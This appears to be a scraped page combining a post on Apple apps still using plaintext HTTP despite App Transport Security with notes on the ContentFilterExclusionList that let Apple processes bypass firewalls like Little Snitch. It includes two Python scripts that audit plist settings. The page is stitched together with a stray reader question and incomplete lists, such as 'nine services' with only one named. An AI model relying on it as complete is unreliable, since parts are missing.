Com.apple.geod.xpc Little Snitch

Updated to make it clear that using port 80 does not mean that Apple's software is insecure. Thanks to Jeffrey Paul for pointing out that this could be misconstrued.

At WWDC this week, Apple announced the App Transport Security feature for iOS and OS X. Apple is strongly encouraging developers to use HTTPS exclusively in new apps, and to make plans to migrate old apps to HTTPS in the near future. While encryption is not yet a requirement, it is the new default. Apps that want to continue to use plaintext HTTP on port 80 will need to explicitly disable the feature in their Info.plist (the NSAppTransportSecurity dictionary).
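As an added example (not code from the original post, and not Apple's implementation), here is a small Python audit of how ATS reads that Info.plist dictionary: it parses NSAppTransportSecurity and decides, for a given URL, whether a cleartext http:// load would be permitted. The sample plist, bundle identifiers and hostnames are constructed. The decision logic is a simplified model of ATS covering the global NSAllowsArbitraryLoads switch and per-domain NSExceptionDomains entries (NSExceptionAllowsInsecureHTTPLoads, NSIncludesSubdomains); TLS version and cipher requirements for https:// are not modelled.

```python
import plistlib
from urllib.parse import urlsplit

# Constructed sample Info.plist (not from any real app): ATS left on globally,
# with one legacy CDN opted out of the HTTPS requirement, subdomains included.
SAMPLE_INFO_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>CFBundleIdentifier</key>
  <string>com.example.ats-demo</string>
  <key>NSAppTransportSecurity</key>
  <dict>
    <key>NSAllowsArbitraryLoads</key>
    <false/>
    <key>NSExceptionDomains</key>
    <dict>
      <key>legacy-cdn.example.net</key>
      <dict>
        <key>NSExceptionAllowsInsecureHTTPLoads</key>
        <true/>
        <key>NSIncludesSubdomains</key>
        <true/>
      </dict>
    </dict>
  </dict>
</dict>
</plist>
"""

# Constructed second policy, as a dict: the blanket opt-out, with one domain
# listed in NSExceptionDomains (which puts that domain back under full ATS).
ARBITRARY_LOADS_PLIST = {
    "CFBundleIdentifier": "com.example.ats-disabled",
    "NSAppTransportSecurity": {
        "NSAllowsArbitraryLoads": True,
        "NSExceptionDomains": {"secure.example.org": {}},
    },
}


def load_info_plist(data: bytes) -> dict:
    """Parse an Info.plist (XML or binary; plistlib handles both)."""
    return plistlib.loads(data)


def ats_policy(info_plist: dict) -> dict:
    """The NSAppTransportSecurity dictionary, or {} when the app takes the default."""
    return info_plist.get("NSAppTransportSecurity") or {}


def _exception_for(host: str, exceptions: dict):
    """Pick the NSExceptionDomains entry covering host (longest match wins),
    honouring NSIncludesSubdomains."""
    host = host.lower()
    best = None
    for domain, rules in exceptions.items():
        d = domain.lower()
        exact = host == d
        sub = rules.get("NSIncludesSubdomains", False) and host.endswith("." + d)
        if (exact or sub) and (best is None or len(d) > len(best[0])):
            best = (d, rules)
    return None if best is None else best[1]


def plaintext_allowed(info_plist: dict, url: str) -> bool:
    """Simplified ATS decision for one URL: may the app load it as written?
    https:// always passes here. A domain listed in NSExceptionDomains uses
    its own keys and ignores the global NSAllowsArbitraryLoads."""
    parts = urlsplit(url)
    if parts.scheme == "https":
        return True
    if parts.scheme != "http":
        raise ValueError("only http and https URLs are modelled")
    ats = ats_policy(info_plist)
    rules = _exception_for(parts.hostname or "", ats.get("NSExceptionDomains") or {})
    if rules is not None:
        return bool(rules.get("NSExceptionAllowsInsecureHTTPLoads", False))
    return bool(ats.get("NSAllowsArbitraryLoads", False))


def weakening_findings(info_plist: dict) -> list:
    """Audit output: every key that opens the app up to plaintext HTTP."""
    ats = ats_policy(info_plist)
    findings = []
    if ats.get("NSAllowsArbitraryLoads", False):
        findings.append("NSAllowsArbitraryLoads=true: ATS off for every domain "
                        "not listed in NSExceptionDomains")
    for domain, rules in sorted((ats.get("NSExceptionDomains") or {}).items()):
        if rules.get("NSExceptionAllowsInsecureHTTPLoads", False):
            scope = "and subdomains" if rules.get("NSIncludesSubdomains", False) else "only"
            findings.append(f"{domain} ({scope}): NSExceptionAllowsInsecureHTTPLoads=true")
    return findings


def audit(info_plist: dict, urls) -> dict:
    """Map each URL to whether ATS would let it load as written."""
    return {u: plaintext_allowed(info_plist, u) for u in urls}


if __name__ == "__main__":
    plist = load_info_plist(SAMPLE_INFO_PLIST)
    for finding in weakening_findings(plist):
        print("finding:", finding)
    for url, ok in audit(plist, ["http://legacy-cdn.example.net/a.jpg",
                                  "http://api.example.com/v1"]).items():
        print("allowed" if ok else "BLOCKED", url)
```

Run against a real bundle, `load_info_plist(open("MyApp.app/Contents/Info.plist", "rb").read())` gives the dictionary to audit; an empty `weakening_findings` result means the app is living with the new default the post describes.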

UPDATE: Apple has since removed this whitelist (the ContentFilterExclusionList described below) completely, allowing third-party firewalls like Little Snitch to reliably monitor and filter any network traffic. Up until macOS 11.1 the whitelist included the following macOS processes. UPDATE 2: The traffic of some Apple processes isn't shown in Little Snitch 5. UPDATE 3: Enabling the Little Snitch 4.6 kext under Big Sur. UPDATE 4: Tweet by Apple developer Russ Bishop: 'Some system processes bypassing NetworkExtensions in macOS is a bug, in case you were wondering.' And some replies.

  • com.apple.geod.xpc
  • AssetCacheLocatorService.xpc
  • nsurlsessiond
  • UserEventAgent

Also, I noticed descriptions on some locked LS rules which I would prefer to deny; if I deny them, do they affect other OS X services?

The ideas behind App Transport Security are great. It's essentially HTTP Strict Transport Security for apps, making it much harder for developers to inadvertently disclose private user information. It's a feature that will benefit the privacy and security of millions of Apple customers. The writing is also on the wall that Apple intends to make this feature mandatory at some point, essentially deprecating plaintext HTTP altogether.

Apple, however, has yet to take their own advice. There are many OS X components and Apple apps that still do not use encryption exclusively, relying on HTTP over port 80. Here's an example from the brand new Photos app, communicating with AWS S3 over port 80:

Since the announcement on Monday, I've been monitoring these requests using a firewall called Little Snitch. Funny enough, even Little Snitch didn't use HTTPS for its initial download or software updates until only a few months ago.

So far I've encountered 9 separate OS X services or first-party apps that are still relying on plaintext HTTP:

  • nsurlsessiond (via S3 and Akamai)

Disclaimer: It's worth noting that although some requests are happening over plain HTTP on port 80, this does not mean that Apple's apps are insecure. Most of the apps using port 80 still encrypt or sign their content. Even if Apple's apps are not insecure, using plain HTTP does mean that they leak at least some extra metadata (HTTP headers, hostnames and URL paths), and that they are not following the rules they're pushing 3rd party developers to follow.

As an aside, it's fascinating just how many different CDNs Apple makes use of, and how heavily they rely on S3 for Photos and iMessage content.

When I first discovered that Photos communicates with AWS S3 without encryption, I submitted a security report to Apple. At the time, they did not consider it an issue and replied with the following:

Follow-up: 622218711

Hello Blake,

Thank you for contacting the Apple Product Security team. We take every report of a potential security issue seriously. This message is being sent to you by a security analyst who has reviewed your note.

Photos are encrypted at rest within iCloud, and are uploaded and downloaded to/from iCloud using an encrypted transport channel.


For more information on iCloud security, please see https://support.apple.com/en-us/HT202303

Regards,


Apple has tons of talented crypto engineers, so I don't doubt that Photos and iCloud store photos with at-rest encryption, or that they are encrypted in the HTTP payloads during transfer. Using plain HTTP does leak at least some additional metadata, though it may not be enough to compromise anybody's privacy in this specific case. But if Apple is asking all 3rd party developers to use HTTPS exclusively, they should be willing to do the same.


In summary, Apple's new App Transport Security feature is a great step towards enhancing the privacy and security of Apple customers around the globe. I look forward to the day when it is a mandatory feature. In the meantime, though, Apple should lead by example by avoiding plaintext HTTP in their own apps and services.

tinyapps.org / blog

Patrick Wardle highlighted a tweet by Maxwell ('Some Apple apps bypass some network extensions and VPN Apps. Maps for example can directly access the internet bypassing any NEFilterDataProvider or NEAppProxyProviders you have running'), sparking an extensive HN discussion on Apple's ham-fisted tactics (not unlike Google's recent behavior).

A search for 'NEFilterDataProvider' turned up David Dudok de Wit's post fingering the ContentFilterExclusionList key in /System/Library/Frameworks/NetworkExtension.framework/Versions/A/Resources/Info.plist as the culprit. The default list includes 56 Apple apps and daemons like App Store, MusicLibrary, softwareupdated, etc.:
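The following is an added example, not code from the tinyapps post or from Apple: a Python script that reads the ContentFilterExclusionList key the way a firewall vendor or an auditor would, to see which identifiers a NEFilterDataProvider-based firewall will never be shown, and to diff the list between OS versions. The two embedded plists are constructed stand-ins for the real Info.plist (which is binary and has 56 entries); the identifiers in them are illustrative and not a transcription of Apple's list. On a Mac, `installed_exclusions()` reads the real file from the path named in the post.

```python
import plistlib

# Path of the real file on macOS Big Sur (assumption: unchanged since the post).
NE_INFO_PLIST = ("/System/Library/Frameworks/NetworkExtension.framework/"
                 "Versions/A/Resources/Info.plist")

# Constructed: the shape of the plist up to macOS 11.1. Entries are illustrative.
SAMPLE_BEFORE_REMOVAL = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>CFBundleIdentifier</key>
  <string>com.apple.NetworkExtension</string>
  <key>ContentFilterExclusionList</key>
  <array>
    <string>com.apple.AppStore</string>
    <string>com.apple.Maps</string>
    <string>com.apple.softwareupdated</string>
  </array>
</dict>
</plist>
"""

# Constructed: the same plist with the key gone, as after Apple removed the whitelist.
SAMPLE_AFTER_REMOVAL = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>CFBundleIdentifier</key>
  <string>com.apple.NetworkExtension</string>
</dict>
</plist>
"""


def exclusion_list(plist_bytes: bytes) -> list:
    """Identifiers that content filters never see; [] when the key is absent."""
    data = plistlib.loads(plist_bytes)
    entries = data.get("ContentFilterExclusionList") or []
    if not isinstance(entries, list):
        raise ValueError("ContentFilterExclusionList is not an array")
    return sorted(str(e) for e in entries)


def installed_exclusions(path: str = NE_INFO_PLIST) -> list:
    """Read the list from the running system (macOS only; binary plists are fine)."""
    with open(path, "rb") as fh:
        return exclusion_list(fh.read())


def bypasses_filter(identifier: str, exclusions) -> bool:
    """True if traffic from identifier is invisible to a NEFilterDataProvider firewall."""
    return identifier in set(exclusions)


def diff_exclusions(old, new) -> dict:
    """What changed between two OS versions' lists."""
    return {"removed": sorted(set(old) - set(new)),
            "added": sorted(set(new) - set(old))}


if __name__ == "__main__":
    before = exclusion_list(SAMPLE_BEFORE_REMOVAL)
    after = exclusion_list(SAMPLE_AFTER_REMOVAL)
    print("excluded before:", before)
    print("excluded after:", after)
    print("com.apple.Maps bypasses filter:", bypasses_filter("com.apple.Maps", before))
    print("diff:", diff_exclusions(before, after))
```

An empty result from `installed_exclusions()` on a current system is the expected state once the key is gone; a non-empty one means the firewall's view of the network is incomplete for exactly those identifiers.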